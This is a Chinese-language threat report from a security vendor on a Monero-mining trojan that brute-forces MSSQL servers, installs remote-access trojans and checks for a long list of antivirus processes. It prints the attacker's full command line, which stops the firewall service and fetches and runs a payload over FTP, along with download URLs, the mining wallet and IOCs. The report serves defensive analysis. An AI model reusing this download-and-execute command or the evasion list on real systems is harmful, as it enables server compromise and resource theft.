挖矿木马针对SQL服务器爆破攻击 中招可致服务器被远程控制

背景

腾讯御见威胁情报中心检测到一例挖矿木马攻击。该木马针对MsSql服务器进行扫描爆破攻击，攻击成功后下载植入挖矿木马，利用服务器资源挖门罗币。从木马控制的钱包地址看，该木马已获得15枚XMR（门罗币），约合人民币5200元。病毒的挖矿行为会大量消耗系统资源，导致企业服务器性能急剧下降，影响业务系统运行。

木马还会在攻陷的服务器安装多个远程控制木马，将木马安装为系统服务，搜集系统信息上传、监控键盘输入、剪切板信息、执行远程命令以及下载执行其他木马。黑客这一行为将对企业数据库服务器构成严重威胁，将导致企业机密信息泄露，企业关键服务器还会成为黑客攻击其他系统的跳板。

腾讯御点终端安全管理系统和腾讯电脑管家均可拦截该木马。

详细分析

黑客针对MsSql服务器进行爆破攻击，攻击成功后，执行以下Shell命令，将Ftp下载脚本代码写入MG09.dll，并通过该Ftp脚本代码下载木马hxxp://60.2.251.85/MsSql.exe：

C:\\windows\\system32\\cmd.exe\" /c net1 stop sharedaccess&echo open 60.2.251.85 > MG09.dll&echo mix>> MG09.dll&echo mix>> MG09.dll&echo binary >> MG09.dll&echo get MsSql.exe c:\\ProgramData\\MsSql.exe >> MG09.dll&echo bye >> MG09.dll&ftp -s:MG09.dll&p -s:MG09.dll&c:\\ProgramData\\foahpwo.dll \"MsSql.exe\"&c:\\ProgramData\\foahpwo.dll \"MsSql.exe\"&del c:\\ProgramData\\MG09.dll /q /f&exit"

然后MsSql.exe拷贝自身到C:\WINDOWS\Microsoft.NET\lsass.exe，并通将其安装为服务启动

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Wdisms System Windows Host

lsass.exe释放XMRig矿机程序lacas.exe

Lacas.exe为门罗币挖矿程序XMRig编译而成，版本为2.13.2

木马lsass.exe执行后启动矿机lacas.exe，启动参数为

stratum+tcp://pool.minexmr.com:80 -u 4AepUdJETVZ683JDFUbx5EFez8XvpjZppUQFYCa5JeMNZSi8UfNUXfhJnq9wgaxTvBVpe9N7cE4neD2pJpGM33iiK

查询该钱包收益，目前已挖矿获得门罗币15XMR，折合人民币5200元。

MsSql服务器感染后还会从黑客服务器下载多个远控木马植入

hxxp://60.2.251.85:9292/jie.exe

hxxp://60.2.251.85:9292/jin.exe

hxxp://60.2.251.85:9292/lang.exe

hxxp://60.2.251.85:9292/fre.exe 

远控木马拷贝自身到系统目录，伪装成“网络宽带”、“MYSQL”、“储存设备”等系统服务进行驻留，然后连接C2服务器，执行远控指令、检测杀软信息和系统信息并上传、监控键盘和剪切板输入、以及下载执行其他木马等操作。

检测以下杀软进程

UnThreat

UnThreat.exe

K7杀毒K7TSecurity.exe

Ad-watch反间谍ad-watch.exe

PSafe反病毒PSafeSysTray.exe

BitDefender

vsserv.exe熊猫卫士remupd.exe 

诺顿rtvscan.exe

Avast

网络安全ashDisp.exe

小红伞avcenter.exe

趋势TMBMSRV.exe

可牛knsdtray.exe

NOD32  

egui.exe

麦咖啡 Mcshield.exe

卡巴avp.exe

F-Secure

f-secure.exe

AVG avgwdsvc.exe

韩国胶囊AYAgent.aye

安博士V3Svc.exe  

Outpost

acs.exe

DR.WEB 

SPIDer.exe 

Comodo

杀毒cfp.exe

微软MSE mssecess.exe

QuickHeal  

QUHLPSVC.EXE

瑞星RavMonD.exe

江民KvMonXP.exe

百度卫士baiduSafeTray.exe  

百度杀毒BaiduSd.exe QQ

电脑管家QQPCRTP.exe

金山安全卫士KSafeTray.exe  

金山毒霸kxetray.exe

360杀毒360sd.exe  

360安全卫士360tray.exe

安全建议

1.加固SQL Server服务器，修补服务器安全漏洞。使用安全的密码策略，使用高强度密码，切勿使用弱口令，特别是sa账号密码，防止黑客暴力破解。

2.修改SQL Sever服务默认端口，在原始配置基础上更改默认1433端口设置，并且设置访问规则，拒绝1433端口探测。

3.企业用户可在服务器部署腾讯御点终端安全管理系统防范此类病毒入侵。

IOCs

Domain

xianzai.noip.cn

URL

hxxp://60.2.251.85:9292/MsSql.exe

hxxp://60.2.251.85:9292/fre.exe

hxxp://60.2.251.85:9292/jie.exe

hxxp://60.2.251.85:9292/jin.exe

hxxp://60.2.251.85:9292/lang.exe

hxxp://60.2.251.85:9292/myssql.exe

hxxp://60.2.251.85:9292/Ugfzdb.exe

md5

c9be80831dbc99dcdd9b67dfd0c53224

90ed56592a6694e5f9fefc52c89816d4

b93becf669f7acc92192adf329590508

f828d9cc6b1e53ace68d8848516b9235

aa8e9c1d9ba0caec428d54cffe1a07e7

01808193d9d8d1181ec82c693ec4d7b7